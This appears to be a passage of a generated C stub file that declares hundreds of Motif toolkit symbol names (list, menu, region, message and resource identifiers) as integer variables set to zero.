int XmListGetMatchPos = 0;
int XmListGetSelectedPos = 0;
int _XmListInit = 0;
int XmListItemExists = 0;
int XmListItemPos = 0;
int _XmList_ListXlations1 = 0;
int _XmList_ListXlations2 = 0;
int XmListPosSelected = 0;
int XmListPosToBounds = 0;
int _XmListRemove = 0;
int XmListReplaceItems = 0;
int XmListReplaceItemsPos = 0;
int XmListReplaceItemsPosUnselected = 0;
int XmListReplaceItemsUnselected = 0;
int XmListReplacePositions = 0;
int XmListSelectItem = 0;
int XmListSelectPos = 0;
int XmListSetAddMode = 0;
int XmListSetBottomItem = 0;
int XmListSetBottomPos = 0;
int XmListSetHorizPos = 0;
int XmListSetItem = 0;
int XmListSetKbdItemPos = 0;
int XmListSetPos = 0;
int XmListUpdateSelectedList = 0;
int xmListWidgetClass = 0;
int XmListYToPos = 0;
int _XmLowerCase = 0;
int _XmLowerTearOffObscuringPoppingDownPanes = 0;
int xmMainWindowClassRec = 0;
int XmMainWindowSep1 = 0;
int XmMainWindowSep2 = 0;
int XmMainWindowSep3 = 0;
int XmMainWindowSetAreas = 0;
int xmMainWindowWidgetClass = 0;
int _XmMakeGeometryRequest = 0;
int xmManagerClassRec = 0;
int _XmManager_defaultTranslations = 0;
int _XmManagerEnter = 0;
int _XmManagerFocusIn = 0;
int _XmManagerFocusInInternal = 0;
int _XmManagerFocusOut = 0;
int _XmManagerGetValuesHook = 0;
int _XmManagerHelp = 0;
int _XmManagerHighlightPixmapDefault = 0;
int _XmManagerImportArgs = 0;
int _XmManagerLeave = 0;
int _XmManager_managerTraversalTranslations = 0;
int _XmManagerParentActivate = 0;
int _XmManagerParentCancel = 0;
int _XmManagerTopShadowPixmapDefault = 0;
int _XmManagerUnmap = 0;
int xmManagerWidgetClass = 0;
int _XmMapBtnEvent = 0;
int _XmMapHashTable = 0;
int _XmMapKeyEvent = 0;
int _XmMapKeyEvents = 0;
int XmMapSegmentEncoding = 0;
int _XmMatchBDragEvent = 0;
int _XmMatchBSelectEvent = 0;
int _XmMatchBtnEvent = 0;
int _XmMatchKeyEvent = 0;
int _XmMenuBarFix = 0;
int _XmMenuBarGadgetSelect = 0;
int _XmMenuBtnDown = 0;
int _XmMenuBtnUp = 0;
int _XmMenuButtonTakeFocus = 0;
int _XmMenuButtonTakeFocusUp = 0;
int _XmMenuCursorContext = 0;
int _XmMenuEscape = 0;
int _XmMenuFocus = 0;
int _XmMenuFocusIn = 0;
int _XmMenuFocusOut = 0;
int _XmMenuGadgetDrag = 0;
int _XmMenuGadgetTraverseCurrent = 0;
int _XmMenuGadgetTraverseCurrentUp = 0;
int _XmMenuGrabKeyboardAndPointer = 0;
int _XmMenuHelp = 0;
int _XmMenuPopDown = 0;
int XmMenuPosition = 0;
int _XmMenuSetInPMMode = 0;
int xmMenuShellClassRec = 0;
int _XmMenuShell_translations = 0;
int xmMenuShellWidgetClass = 0;
int _XmMenuTraversalHandler = 0;
int _XmMenuTraverseDown = 0;
int _XmMenuTraverseLeft = 0;
int _XmMenuTraverseRight = 0;
int _XmMenuTraverseUp = 0;
int _XmMenuUnmap = 0;
int xmMessageBoxClassRec = 0;
int _XmMessageBoxGeoMatrixCreate = 0;
int XmMessageBoxGetChild = 0;
int _XmMessageBoxNoGeoRequest = 0;
int xmMessageBoxWidgetClass = 0;
int _XmMessageTypeToReason = 0;
int _XmMgrTraversal = 0;
int _XmMicroSleep = 0;
int _Xm_MOTIF_DRAG_AND_DROP_MESSAGE = 0;
int _XmMoveCursorIconQuark = 0;
int _XmMoveObject = 0;
int _XmMoveWidget = 0;
int _XmMsgBaseClass_0000 = 0;
int _XmMsgBaseClass_0001 = 0;
int _XmMsgBulletinB_0001 = 0;
int _XmMsgCascadeB_0000 = 0;
int _XmMsgCascadeB_0001 = 0;
int _XmMsgCascadeB_0002 = 0;
int _XmMsgCascadeB_0003 = 0;
int _XmMsgColObj_0001 = 0;
int _XmMsgColObj_0002 = 0;
int _XmMsgComboBox_0000 = 0;
int _XmMsgComboBox_0001 = 0;
int _XmMsgComboBox_0004 = 0;
int _XmMsgComboBox_0005 = 0;
int _XmMsgComboBox_0006 = 0;
int _XmMsgComboBox_0007 = 0;
int _XmMsgComboBox_0008 = 0;
int _XmMsgComboBox_0009 = 0;
int _XmMsgComboBox_0010 = 0;
int _XmMsgComboBox_0011 = 0;
int _XmMsgComboBox_0012 = 0;
int _XmMsgComboBox_0013 = 0;
int _XmMsgComboBox_0014 = 0;
int _XmMsgCommand_0000 = 0;
int _XmMsgCommand_0001 = 0;
int _XmMsgCommand_0002 = 0;
int _XmMsgCommand_0003 = 0;
int _XmMsgCommand_0004 = 0;
int _XmMsgCommand_0005 = 0;
int _XmMsgContainer_0000 = 0;
int _XmMsgContainer_0001 = 0;
int _XmMsgCutPaste_0000 = 0;
int _XmMsgCutPaste_0001 = 0;
int _XmMsgCutPaste_0002 = 0;
int _XmMsgCutPaste_0003 = 0;
int _XmMsgCutPaste_0004 = 0;
int _XmMsgCutPaste_0005 = 0;
int _XmMsgCutPaste_0006 = 0;
int _XmMsgCutPaste_0007 = 0;
int _XmMsgCutPaste_0008 = 0;
int _XmMsgCutPaste_0009 = 0;
int _XmMsgDataF_0000 = 0;
int _XmMsgDataF_0001 = 0;
int _XmMsgDataF_0002 = 0;
int _XmMsgDataF_0003 = 0;
int _XmMsgDataF_0004 = 0;
int _XmMsgDataF_0005 = 0;
int _XmMsgDataF_0006 = 0;
int _XmMsgDataFWcs_0000 = 0;
int _XmMsgDataFWcs_0001 = 0;
int _XmMsgDialogS_0000 = 0;
int _XmMsgDisplay_0001 = 0;
int _XmMsgDisplay_0002 = 0;
int _XmMsgDisplay_0003 = 0;
int _XmMsgDragBS_0000 = 0;
int _XmMsgDragBS_0001 = 0;
int _XmMsgDragBS_0002 = 0;
int _XmMsgDragBS_0003 = 0;
int _XmMsgDragBS_0004 = 0;
int _XmMsgDragBS_0005 = 0;
int _XmMsgDragBS_0006 = 0;
int _XmMsgDragC_0001 = 0;
int _XmMsgDragC_0002 = 0;
int _XmMsgDragC_0003 = 0;
int _XmMsgDragC_0004 = 0;
int _XmMsgDragC_0005 = 0;
int _XmMsgDragC_0006 = 0;
int _XmMsgDragICC_0000 = 0;
int _XmMsgDragICC_0001 = 0;
int _XmMsgDragIcon_0000 = 0;
int _XmMsgDragIcon_0001 = 0;
int _XmMsgDragOverS_0000 = 0;
int _XmMsgDragOverS_0001 = 0;
int _XmMsgDragOverS_0002 = 0;
int _XmMsgDragOverS_0003 = 0;
int _XmMsgDragUnder_0000 = 0;
int _XmMsgDragUnder_0001 = 0;
int _XmMsgDropSMgr_0001 = 0;
int _XmMsgDropSMgr_0002 = 0;
int _XmMsgDropSMgr_0003 = 0;
int _XmMsgDropSMgr_0004 = 0;
int _XmMsgDropSMgr_0005 = 0;
int _XmMsgDropSMgr_0006 = 0;
int _XmMsgDropSMgr_0007 = 0;
int _XmMsgDropSMgr_0008 = 0;
int _XmMsgDropSMgr_0009 = 0;
int _XmMsgDropSMgr_0010 = 0;
int _XmMsgDropSMgrI_0001 = 0;
int _XmMsgDropSMgrI_0002 = 0;
int _XmMsgDropSMgrI_0003 = 0;
int _XmMsgForm_0000 = 0;
int _XmMsgForm_0002 = 0;
int _XmMsgForm_0003 = 0;
int _XmMsgGadget_0000 = 0;
int _XmMsgLabel_0003 = 0;
int _XmMsgLabel_0004 = 0;
int _XmMsgList_0000 = 0;
int _XmMsgList_0005 = 0;
int _XmMsgList_0006 = 0;
int _XmMsgList_0007 = 0;
int _XmMsgList_0008 = 0;
int _XmMsgList_0009 = 0;
int _XmMsgList_0010 = 0;
int _XmMsgList_0011 = 0;
int _XmMsgList_0012 = 0;
int _XmMsgList_0013 = 0;
int _XmMsgList_0014 = 0;
int _XmMsgList_0015 = 0;
int _XmMsgMainW_0000 = 0;
int _XmMsgMainW_0001 = 0;
int _XmMsgManager_0000 = 0;
int _XmMsgManager_0001 = 0;
int _XmMsgMenuShell_0000 = 0;
int _XmMsgMenuShell_0001 = 0;
int _XmMsgMenuShell_0002 = 0;
int _XmMsgMenuShell_0003 = 0;
int _XmMsgMenuShell_0004 = 0;
int _XmMsgMenuShell_0005 = 0;
int _XmMsgMenuShell_0006 = 0;
int _XmMsgMenuShell_0007 = 0;
int _XmMsgMenuShell_0008 = 0;
int _XmMsgMenuShell_0009 = 0;
int _XmMsgMessageB_0003 = 0;
int _XmMsgMessageB_0004 = 0;
int _XmMsgMotif_0000 = 0;
int _XmMsgMotif_0001 = 0;
int _XmMsgNotebook_0000 = 0;
int _XmMsgPanedW_0000 = 0;
int _XmMsgPanedW_0001 = 0;
int _XmMsgPanedW_0002 = 0;
int _XmMsgPanedW_0004 = 0;
int _XmMsgPanedW_0005 = 0;
int _XmMsgPixConv_0000 = 0;
int _XmMsgPrimitive_0000 = 0;
int _XmMsgProtocols_0000 = 0;
int _XmMsgProtocols_0001 = 0;
int _XmMsgProtocols_0002 = 0;
int _XmMsgRegion_0000 = 0;
int _XmMsgRepType_0000 = 0;
int _XmMsgRepType_0001 = 0;
int _XmMsgRepType_0002 = 0;
int _XmMsgResConvert_0001 = 0;
int _XmMsgResConvert_0002 = 0;
int _XmMsgResConvert_0003 = 0;
int _XmMsgResConvert_0005 = 0;
int _XmMsgResConvert_0006 = 0;
int _XmMsgResConvert_0007 = 0;
int _XmMsgResConvert_0008 = 0;
int _XmMsgResConvert_0009 = 0;
int _XmMsgResConvert_0010 = 0;
int _XmMsgResConvert_0011 = 0;
int _XmMsgResConvert_0012 = 0;
int _XmMsgResConvert_0013 = 0;
int _XmMsgResource_0001 = 0;
int _XmMsgResource_0002 = 0;
int _XmMsgResource_0003 = 0;
int _XmMsgResource_0004 = 0;
int _XmMsgResource_0005 = 0;
int _XmMsgResource_0006 = 0;
int _XmMsgResource_0007 = 0;
int _XmMsgResource_0008 = 0;
int _XmMsgResource_0009 = 0;
int _XmMsgResource_0010 = 0;
int _XmMsgResource_0011 = 0;
int _XmMsgResource_0012 = 0;
int _XmMsgResource_0013 = 0;
int _XmMsgRowColText_0024 = 0;
int _XmMsgRowColumn_0000 = 0;
int _XmMsgRowColumn_0001 = 0;
int _XmMsgRowColumn_0002 = 0;
int _XmMsgRowColumn_0003 = 0;
int _XmMsgRowColumn_0004 = 0;
int _XmMsgRowColumn_0005 = 0;
int _XmMsgRowColumn_0007 = 0;
int _XmMsgRowColumn_0008 = 0;
int _XmMsgRowColumn_0015 = 0;
int _XmMsgRowColumn_0016 = 0;
int _XmMsgRowColumn_0017 = 0;
int _XmMsgRowColumn_0018 = 0;
int _XmMsgRowColumn_0019 = 0;
int _XmMsgRowColumn_0020 = 0;
int _XmMsgRowColumn_0022 = 0;
int _XmMsgRowColumn_0023 = 0;
int _XmMsgRowColumn_0025 = 0;
int _XmMsgRowColumn_0026 = 0;
int _XmMsgRowColumn_0027 = 0;
int _XmMsgScale_0000 = 0;
int _XmMsgScale_0001 = 0;
int _XmMsgScale_0002 = 0;
int _XmMsgScale_0006 = 0;
int _XmMsgScale_0007 = 0;
int _XmMsgScale_0008 = 0;
int _XmMsgScale_0009 = 0;
int _XmMsgScaleScrBar_0004 = 0;
int _XmMsgScreen_0000 = 0;
int _XmMsgScreen_0001 = 0;
int _XmMsgScrollBar_0000 = 0;
int _XmMsgScrollBar_0001 = 0;
int _XmMsgScrollBar_0002 = 0;
int _XmMsgScrollBar_0003 = 0;
int _XmMsgScrollBar_0004 = 0;
int _XmMsgScrollBar_0005 = 0;
int _XmMsgScrollBar_0006 = 0;
int _XmMsgScrollBar_0007 = 0;
int _XmMsgScrollBar_0008 = 0;
int _XmMsgScrolledW_0004 = 0;
int _XmMsgScrolledW_0005 = 0;
int _XmMsgScrolledW_0006 = 0;
int _XmMsgScrolledW_0007 = 0;
int _XmMsgScrolledW_0008 = 0;
int _XmMsgScrolledW_0009 = 0;
int _XmMsgScrollFrameT_0000 = 0;
int _XmMsgScrollFrameT_0001 = 0;
int _XmMsgScrollVis_0000 = 0;
int _XmMsgSelectioB_0001 = 0;
int _XmMsgSelectioB_0002 = 0;
int _XmMsgSpinB_0003 = 0;
int _XmMsgSpinB_0004 = 0;
int _XmMsgSpinB_0005 = 0;
int _XmMsgSpinB_0006 = 0;
int _XmMsgSpinB_0007 = 0;
int _XmMsgSpinB_0008 = 0;
int _XmMsgSSpinB_0001 = 0;
int _XmMsgSSpinB_0002 = 0;
int _XmMsgSSpinB_0003 = 0;
int _XmMsgText_0000 = 0;
int _XmMsgTextF_0000 = 0;
int _XmMsgTextF_0001 = 0;
int _XmMsgTextF_0002 = 0;
int _XmMsgTextF_0003 = 0;
int _XmMsgTextF_0004 = 0;
int _XmMsgTextF_0006 = 0;
int _XmMsgTextFWcs_0000 = 0;
int _XmMsgTextIn_0000 = 0;
int _XmMsgTextOut_0000 = 0;
int _XmMsgTransfer_0000 = 0;
int _XmMsgTransfer_0002 = 0;
int _XmMsgTransfer_0003 = 0;
int _XmMsgTransfer_0004 = 0;
int _XmMsgTransfer_0005 = 0;
int _XmMsgTransfer_0006 = 0;
int _XmMsgTransfer_0007 = 0;
int _XmMsgVaSimple_0000 = 0;
int _XmMsgVaSimple_0001 = 0;
int _XmMsgVaSimple_0002 = 0;
int _XmMsgVendor_0000 = 0;
int _XmMsgVendor_0001 = 0;
int _XmMsgVendor_0002 = 0;
int _XmMsgVendor_0003 = 0;
int _XmMsgVisual_0000 = 0;
int _XmMsgVisual_0001 = 0;
int _XmMsgVisual_0002 = 0;
int _XmMsgXmIm_0000 = 0;
int _XmMsgXmRenderT_0000 = 0;
int _XmMsgXmRenderT_0001 = 0;
int _XmMsgXmRenderT_0002 = 0;
int _XmMsgXmRenderT_0003 = 0;
int _XmMsgXmRenderT_0004 = 0;
int _XmMsgXmRenderT_0005 = 0;
int _XmMsgXmString_0000 = 0;
int _XmMsgXmTabList_0000 = 0;
int xmMultiListClassRec = 0;
int XmMultiListDeselectItems = 0;
int XmMultiListDeselectRow = 0;
int XmMultiListGetSelectedRowArray = 0;
int XmMultiListGetSelectedRows = 0;
int XmMultiListMakeRowVisible = 0;
int XmMultiListSelectAllItems = 0;
int XmMultiListSelectItems = 0;
int XmMultiListSelectRow = 0;
int XmMultiListToggleRow = 0;
int XmMultiListUnselectAllItems = 0;
int XmMultiListUnselectItem = 0;
int xmMultiListWidgetClass = 0;
int _XmNavigate = 0;
int _XmNavigChangeManaged = 0;
int _XmNavigDestroy = 0;
int _XmNavigInitialize = 0;
int _XmNavigResize = 0;
int _XmNavigSetValues = 0;
int _XmNewTravGraph = 0;
int _XmNoneCursorIconQuark = 0;
int xmNotebookClassRec = 0;
int XmNotebookGetPageInfo = 0;
int _XmNotebook_manager_translations = 0;
int _XmNotebook_TabAccelerators = 0;
int xmNotebookWidgetClass = 0;
int _XmNotifyChildrenVisual = 0;
int _XmNumDSResources = 0;
int XmObjectAtPoint = 0;
int _XmOffsetArrow = 0;
int XmOptionButtonGadget = 0;
int XmOptionLabelGadget = 0;
int _XmOSAbsolutePathName = 0;
int _XmOSBuildFileList = 0;
int _XmOSBuildFileName = 0;
int _XmOSFileCompare = 0;
int _XmOSFindPathParts = 0;
int _XmOSFindPatternPart = 0;
int _XmOSGenerateMaskName = 0;
int _XmOSGetCharDirection = 0;
int _XmOSGetDirEntries = 0;
int _XmOSGetHomeDirName = 0;
int _XmOSGetInitialCharsDirection = 0;
int _XmOSGetLocalizedString = 0;
int XmOSGetMethod = 0;
int _XmOSInitPath = 0;
int _XmOSKeySymToCharacter = 0;
int _XmOSPutenv = 0;
int _XmOSQualifyFileSpec = 0;
int xmOutlineClassRec = 0;
int xmOutlineWidgetClass = 0;
int XMoveResizeWindow = 0;
int XMoveWindow = 0;
int xmPanedClassRec = 0;
int XmPanedGetPanes = 0;
int xmPanedWidgetClass = 0;
int xmPanedWindowClassRec = 0;
int xmPanedWindowWidgetClass = 0;
int _XmParentProcess = 0;
int XmParseMappingCreate = 0;
int XmParseMappingFree = 0;
int XmParseMappingGetValues = 0;
int XmParseMappingSetValues = 0;
int XmParsePicture = 0;
int XmParseTableFree = 0;
int _XmPathIsTraversable = 0;
int XmPictureDelete = 0;
int XmPictureDeleteState = 0;
int XmPictureDoAutoFill = 0;
int XmPictureGetCurrentString = 0;
int XmPictureProcessCharacter = 0;
int _XmPngGetImage = 0;
int _XmPopdown = 0;
int _XmPopup = 0;
int _XmPopupSpringLoaded = 0;
int _XmPopWidgetExtData = 0;
int _XmPostPopupMenu = 0;
int _XmPrimbaseClassExtRec = 0;
int _XmPrimClassExtRec = 0;
int xmPrimitiveClassRec = 0;
int _XmPrimitive_defaultTranslations = 0;
int _XmPrimitiveEnter = 0;
int _XmPrimitiveFocusIn = 0;
int _XmPrimitiveFocusInInternal = 0;
int _XmPrimitiveFocusOut = 0;
int _XmPrimitiveGetValuesHook = 0;
int _XmPrimitiveHelp = 0;
int _XmPrimitiveHighlightPixmapDefault = 0;
int _XmPrimitiveImportArgs = 0;
int _XmPrimitiveLeave = 0;
int _XmPrimitiveParentActivate = 0;
int _XmPrimitiveParentCancel = 0;
int _XmPrimitiveTopShadowPixmapDefault = 0;
int _XmPrimitiveUnmap = 0;
int xmPrimitiveWidgetClass = 0;
int _XmProcessDrag = 0;
int _XmProcessTraversal = 0;
int XmProcessTraversal = 0;
int xmProtocolClassRec = 0;
int xmProtocolObjectClass = 0;
int _XmPushB_defaultTranslations = 0;
int _XmPushBGadClassExtRec = 0;
int _XmPushB_menuTranslations = 0;
int _XmPushBPrimClassExtRec = 0;
int xmPushButtonClassRec = 0;
int xmPushButtonGadgetClass = 0;
int xmPushButtonGadgetClassRec = 0;
int xmPushButtonGCacheObjClassRec = 0;
int xmPushButtonWidgetClass = 0;
int _XmPushWidgetExtData = 0;
int _XmPutScaledImage = 0;
int XmQmotif = 0;
int XmQTaccessColors = 0;
int XmQTaccessTextual = 0;
int XmQTactivatable = 0;
int XmQTcareParentVisual = 0;
int _XmQTclipWindow = 0;
int XmQTcontainer = 0;
int XmQTcontainerItem = 0;
int XmQTdialogShellSavvy = 0;
int XmQTjoinSide = 0;
int XmQTmenuSavvy = 0;
int XmQTmenuSystem = 0;
int XmQTmotifTrait = 0;
int XmQTnavigator = 0;
int XmQTpointIn = 0;
int XmQTscrollFrame = 0;
int XmQTspecifyLayoutDirection = 0;
int XmQTspecifyRenderTable = 0;
int XmQTspecifyUnhighlight = 0;
int XmQTspecifyUnitType = 0;
int XmQTtakesDefault = 0;
int XmQTtoolTip = 0;
int XmQTtoolTipConfig = 0;
int XmQTtransfer = 0;
int XmQTtraversalControl = 0;
int _XmQualifyLabelLocalCache = 0;
int _XmQueryPixmapCache = 0;
int _XmQueueCount = 0;
int _XmQueueFree = 0;
int _XmQueueInit = 0;
int _XmQueuePop = 0;
int _XmRCAdaptToSize = 0;
int _XmRC_AddPopupEventHandlers = 0;
int _XmRC_AddToPostFromList = 0;
int _XmRCArmAndActivate = 0;
int _XmRC_CheckAndSetOptionCascade = 0;
int _XmRCColorHook = 0;
int _XmRCDoMarginAdjustment = 0;
int _XmRC_DoProcessMenuTree = 0;
int _XmRC_GadgetTraverseDown = 0;
int _XmRC_GadgetTraverseLeft = 0;
int _XmRC_GadgetTraverseRight = 0;
int _XmRC_GadgetTraverseUp = 0;
int _XmRCGetKidGeo = 0;
int _XmRC_GetLabelString = 0;
int _XmRC_GetMenuAccelerator = 0;
int _XmRC_GetMnemonicCharSet = 0;
int _XmRCGetTopManager = 0;
int _XmRC_KeyboardInputHandler = 0;
int _XmRCMenuProcedureEntry = 0;
int _XmRC_menuSystemRecord = 0;
int _XmRC_PostTimeOut = 0;
int _XmRCPreferredSize = 0;
int _XmRC_ProcessSingleWidget = 0;
int _XmRC_RemoveFromPostFromList = 0;
int _XmRC_RemoveFromPostFromListOnDestroyCB = 0;
int _XmRC_RemoveHandlersFromPostFromWidget = 0;
int _XmRC_RemovePopupEventHandlers = 0;
int _XmRCSetKidGeo = 0;
int _XmRC_SetMenuHistory = 0;
int _XmRC_SetOptionMenuHistory = 0;
int _XmRC_SetOrGetTextMargins = 0;
int _XmRCThinkAboutSize = 0;
int _XmRC_UpdateOptionMenuCBG = 0;
int _XmReadDragBuffer = 0;
int _XmReadDSFromStream = 0;
int _XmReadImageAndHotSpotFromFile = 0;
int _XmReadInitiatorInfo = 0;
int _XmReasonToMessageType = 0;
int _XmReCacheLabG = 0;
int _XmReCacheLabG_r = 0;
int _XmRecordEvent = 0;
int _XmRedisplayGadgets = 0;
int _XmRedisplayHBar = 0;
int _XmRedisplayLabG = 0;
int _XmRedisplayVBar = 0;
int _XmRegionClear = 0;
int _XmRegionComputeExtents = 0;
int _XmRegionCreate = 0;
int _XmRegionCreateSize = 0;
int _XmRegionDestroy = 0;
int _XmRegionDrawShadow = 0;
int _XmRegionEqual = 0;
int _XmRegionFromImage = 0;
int _XmRegionGetExtents = 0;
int _XmRegionGetNumRectangles = 0;
int _XmRegionGetRectangles = 0;
int _XmRegionIntersect = 0;
int _XmRegionIntersectRectWithRegion = 0;
int _XmRegionIsEmpty = 0;
int _XmRegionOffset = 0;
int _XmRegionPointInRegion = 0;
int _XmRegionSetGCRegion = 0;
int _XmRegionShrink = 0;
int _XmRegionSubtract = 0;
int _XmRegionUnion = 0;
int _XmRegionUnionRectWithRegion = 0;
int _XmRegisterConverters = 0;
int XmRegisterConverters = 0;
int _XmRegisterPixmapConverters = 0;
int XmRegisterSegmentEncoding = 0;
int _XmRemoveAllCallbacks = 0;
int _XmRemoveCallback = 0;
int XmRemoveFromPostFromList = 0;
int _XmRemoveGrab = 0;
int _XmRemoveHashEntry = 0;
int _XmRemoveHashIterator = 0;
int XmRemoveProtocolCallback = 0;
int XmRemoveProtocols = 0;
int XmRemoveTabGroup = 0;
int _Xm_RemQueue = 0;
int _XmRenderCacheGet = 0;
int _XmRenderCacheSet = 0;
int XmRenderTableAddRenditions = 0;
int XmRenderTableCopy = 0;
int XmRenderTableCvtFromProp = 0;
int XmRenderTableCvtToProp = 0;
int _XmRenderTableDisplay = 0;
int _XmRenderTableFindFallback = 0;
int _XmRenderTableFindFirstFont = 0;
int _XmRenderTableFindRendition = 0;
int XmRenderTableFree = 0;
int XmRenderTableGetDefaultFontExtents = 0;
int XmRenderTableGetRendition = 0;
int XmRenderTableGetRenditions = 0;
int XmRenderTableGetTags = 0;
int _XmRenderTableRemoveRenditions = 0;
int XmRenderTableRemoveRenditions = 0;
int _XmRenditionCopy = 0;
int _XmRenditionCreate = 0;
int XmRenditionCreate = 0;
int XmRenditionFree = 0;
int _XmRenditionMerge = 0;
int XmRenditionRetrieve = 0;
int XmRenditionUpdate = 0;
int _XmReOrderResourceList = 0;
int XmRepTypeAddReverse = 0;
int XmRepTypeGetId = 0;
int XmRepTypeGetNameList = 0;
int XmRepTypeGetRecord = 0;
int XmRepTypeGetRegistered = 0;
int _XmRepTypeInstallConverters = 0;
int XmRepTypeInstallTearOffModelConverter = 0;
int XmRepTypeRegister = 0;
int XmRepTypeValidValue = 0;
int _XmRequestNewSize = 0;
int _XmResetTravGraph = 0;
int _XmResizeHashTable = 0;
int _XmResizeObject = 0;
int _XmResizeWidget = 0;
int XmResolveAllPartOffsets = 0;
int XmResolveAllPartOffsets64 = 0;
int XmResolvePartOffsets = 0;
int _XmRestoreCoreClassTranslations = 0;
int _XmRestoreExcludedTearOffToToplevelShell = 0;
int _XmRestoreTearOffToMenuShell = 0;
int _XmRestoreTearOffToToplevelShell = 0;
int _XmRootGeometryManager = 0;
int _XmRowColumn_bar_table = 0;
int xmRowColumnClassRec = 0;
int _XmRowColumn_menu_table = 0;
int _XmRowColumn_menu_traversal_table = 0;
int _XmRowColumn_option_table = 0;
int xmRowColumnWidgetClass = 0;
int _XmSaccelerator = 0;
int _XmSacceleratorText = 0;
int _XmSactivateCallback = 0;
int _XmSadjustLast = 0;
int _XmSadjustMargin = 0;
int _XmSalignment = 0;
int _XmSallowOverlap = 0;
int _XmSallowResize = 0;
int _XmSanimationMask = 0;
int _XmSanimationPixmap = 0;
int _XmSanimationPixmapDepth = 0;
int _XmSanimationStyle = 0;
int _XmSapplyCallback = 0;
int _XmSapplyLabelString = 0;
int _XmSarmCallback = 0;
int _XmSarmColor = 0;
int _XmSarmPixmap = 0;
int _XmSarrowDirection = 0;
int xmSashClassRec = 0;
int _XmSash_defTranslations = 0;
int xmSashWidgetClass = 0;
int _XmSattachment = 0;
int _XmSaudibleWarning = 0;
int _XmSautomaticSelection = 0;
int _XmSautoShowCursorPosition = 0;
int _XmSautoUnmanage = 0;
int _XmSavailability = 0;
int _XmSaveCoreClassTranslations = 0;
int _XmSaveMenuProcContext = 0;
int _XmSblendModel = 0;
int _XmSblinkRate = 0;
int _XmSbottomAttachment = 0;
int _XmSbottomOffset = 0;
int _XmSbottomPosition = 0;
int _XmSbottomShadowColor = 0;
int _XmSbottomShadowPixmap = 0;
int _XmSbottomWidget = 0;
int _XmSbrowseSelectionCallback = 0;
int _XmSbuttonAccelerators = 0;
int _XmSbuttonAcceleratorText = 0;
int _XmSbuttonCount = 0;
int _XmSbuttonFontList = 0;
int _XmSbuttonMnemonicCharSets = 0;
int _XmSbuttonMnemonics = 0;
int _XmSbuttons = 0;
int _XmSbuttonSet = 0;
int _XmSbuttonType = 0;
int _XmSCAccelerator = 0;
int _XmSCAcceleratorText = 0;
int _XmSCAdjustLast = 0;
int _XmSCAdjustMargin = 0;
int xmScaleClassRec = 0;
int _XmScaleGetTitleString = 0;
int XmScaleGetValue = 0;
int XmScaleSetTicks = 0;
int XmScaleSetValue = 0;
int xmScaleWidgetClass = 0;
int _XmSCAlignment = 0;
int _XmSCAllowOverlap = 0;
int _XmScancelButton = 0;
int _XmScancelCallback = 0;
int _XmScancelLabelString = 0;
int _XmSCAnimationMask = 0;
int _XmSCAnimationPixmap = 0;
int _XmSCAnimationPixmapDepth = 0;
int _XmSCAnimationStyle = 0;
int _XmScanningCacheGet = 0;
int _XmScanningCacheSet = 0;
int _XmSCApplyLabelString = 0;
int _XmSCArmCallback = 0;
int _XmSCArmColor = 0;
int _XmSCArmPixmap = 0;
int _XmSCArrowDirection = 0;
int _XmScascadeButton = 0;
int _XmScascadePixmap = 0;
int _XmScascadingCallback = 0;
int _XmSCAtomList = 0;
int _XmSCAttachment = 0;
int _XmSCAudibleWarning = 0;
int _XmSCAutomaticSelection = 0;
int _XmSCAutoShowCursorPosition = 0;
int _XmSCAutoUnmanage = 0;
int _XmSCAvailability = 0;
int _XmSCBackgroundPixmap = 0;
int _XmSCBlendModel = 0;
int _XmSCBlinkRate = 0;
int _XmSCBooleanDimension = 0;
int _XmSCBottomShadowColor = 0;
int _XmSCBottomShadowPixmap = 0;
int _XmSCButtonAccelerators = 0;
int _XmSCButtonAcceleratorText = 0;
int _XmSCButtonCount = 0;
int _XmSCButtonFontList = 0;
int _XmSCButtonMnemonicCharSets = 0;
int _XmSCButtonMnemonics = 0;
int _XmSCButtons = 0;
int _XmSCButtonSet = 0;
int _XmSCButtonType = 0;
int _XmSCCallbackProc = 0;
int _XmSCCancelLabelString = 0;
int _XmSCChar = 0;
int _XmSCCharSetTable = 0;
int _XmSCChildHorizontalAlignment = 0;
int _XmSCChildHorizontalSpacing = 0;
int _XmSCChildPlacement = 0;
int _XmSCChildren = 0;
int _XmSCChildType = 0;
int _XmSCChildVerticalAlignment = 0;
int _XmSCClientData = 0;
int _XmSCClipWindow = 0;
int _XmSCColumns = 0;
int _XmSCCommandWindow = 0;
int _XmSCCommandWindowLocation = 0;
int _XmSCCompoundText = 0;
int _XmSCConvertProc = 0;
int _XmSCCursorBackground = 0;
int _XmSCCursorForeground = 0;
int _XmSCCursorPosition = 0;
int _XmSCCursorPositionVisible = 0;
int _XmSCDarkThreshold = 0;
int _XmSCDecimalPoints = 0;
int _XmSCDefaultButtonShadowThickness = 0;
int _XmSCDefaultButtonType = 0;
int _XmSCDefaultCopyCursorIcon = 0;
int _XmSCDefaultFontList = 0;
int _XmSCDefaultInvalidCursorIcon = 0;
int _XmSCDefaultLinkCursorIcon = 0;
int _XmSCDefaultMoveCursorIcon = 0;
int _XmSCDefaultNoneCursorIcon = 0;
int _XmSCDefaultPosition = 0;
int _XmSCDefaultSourceCursorIcon = 0;
int _XmSCDefaultValidCursorIcon = 0;
int _XmSCDeleteResponse = 0;
int _XmSCDesktopParent = 0;
int _XmSCDialogStyle = 0;
int _XmSCDialogTitle = 0;
int _XmSCDialogType = 0;
int _XmSCDirectory = 0;
int _XmSCDirectoryValid = 0;
int _XmSCDirListItemCount = 0;
int _XmSCDirListItems = 0;
int _XmSCDirListLabelString = 0;
int _XmSCDirMask = 0;
int _XmSCDirSearchProc = 0;
int _XmSCDirSpec = 0;
int _XmSCDisarmCallback = 0;
int _XmSCDoubleClickInterval = 0;
int _XmSCDragContextClass = 0;
int _XmSCDragDropFinishCallback = 0;
int _XmSCDragIconClass = 0;
int _XmSCDragInitiatorProtocolStyle = 0;
int _XmSCDragMotionCallback = 0;
int _XmSCDragOperations = 0;
int _XmSCDragOverMode = 0;
int _XmSCDragProc = 0;
int _XmSCDragReceiverProtocolStyle = 0;
int _XmSCDropProc = 0;
int _XmSCDropRectangles = 0;
int _XmSCDropSiteActivity = 0;
int _XmSCDropSiteEnterCallback = 0;
int _XmSCDropSiteLeaveCallback = 0;
int _XmSCDropSiteManagerClass = 0;
int _XmSCDropSiteOperations = 0;
int _XmSCDropSiteType = 0;
int _XmSCDropStartCallback = 0;
int _XmSCDropTransferClass = 0;
int _XmSCDropTransfers = 0;
int _XmSCEditable = 0;
int _XmSCEntryBorder = 0;
int _XmSCEntryClass = 0;
int _XmSCExportTargets = 0;
int _XmSCExposeCallback = 0;
